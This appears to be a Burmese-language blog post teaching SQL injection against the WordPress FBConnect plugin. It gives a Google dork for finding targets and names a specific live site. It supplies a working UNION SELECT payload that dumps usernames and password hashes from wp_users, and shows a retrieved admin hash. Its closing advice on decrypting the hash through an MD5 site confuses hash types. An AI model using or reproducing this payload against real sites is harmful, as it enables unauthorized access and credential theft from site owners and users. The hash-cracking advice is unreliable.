WordPress plugin FBConnect SQL Injection Vulnerability

Google Dork: inurl:"fbconnect_action=myhome"

ွSQL Injection ပုိင္းေလ့လာေနတဲ့ ကြ်န္ေတာ့္အကိုၾကီးအတြက္ ကြ်န္ေတာ္ wordpress ဆုိဒ္ေတြကို
injection လုပ္နည္းျပသြားမယ္ဗ်ာ..

http://culturalfuel.net/?fbconnect_action=myhome&userid=6

ကိုသြားလုိက္ပါ..
အုိေက web page က်လာျပီဆုိရင္
 /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat
(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
ကို ထပ္ေပါင္းထည့္လုိက္ပါ..
ေအာက္ကလုိေလးေပ့ါ..

http://culturalfuel.net/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat
(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--

ကြ်န္ေတာ္တုိ ့
Status:
Name: 10
Nickname:
Member since: 7
Website URL: admin:$P$BmbAVkuorxummmPqtvzizFukpu7tQN.
About me:

ဆုိျပီးျမင္ရပါမယ္..
အဲ့မွာ..admin:$P$BmbAVkuorxummmPqtvzizFukpu7tQN.
ဆုိတာကိုေတြ ့ပါမယ္..
ဒီေတာ့ အေျဖက ရွင္းသြားပါျပီ..
username : admin
password : $P$BmbAVkuorxummmPqtvzizFukpu7tQN. (encrypt)

အဲေမ့ေတာ့မလုိ ့ တစ္ခ်ဳိ ့က လဲ နည္းနညး္ပိန္းတယ္ဗ်... ကြ်န္ေတာ့ လုိေပ့ါဗ်ာ..
http://md5encryption.com/
အဲ့လင့္ကိုထပ္သြားလုိက္ပါ..
ျပီးရင္ ... 
encrypt လုပ္လုိက္ပါအုံး....

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com